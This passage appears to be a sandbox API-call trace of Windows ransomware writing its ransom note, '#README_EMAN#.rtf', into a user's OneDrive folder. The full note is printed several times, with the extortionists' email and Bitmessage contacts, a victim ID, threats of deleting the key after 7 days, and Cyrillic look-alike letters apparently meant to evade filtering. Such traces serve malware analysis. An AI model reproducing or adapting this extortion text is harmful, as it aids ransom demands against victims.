h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGoH\x93Ò\x14FE¶\x8a\x10Oå \x18¸a¸éP\x10úÈ\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0298.958] WriteFile (in: hFile=0x27c, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.959] CloseHandle (hObject=0x27c) returned 1 [0298.959] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\#readme_eman#.rtf")) returned 0xffffffff [0298.959] GetLastError () returned 0x2 [0298.959] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 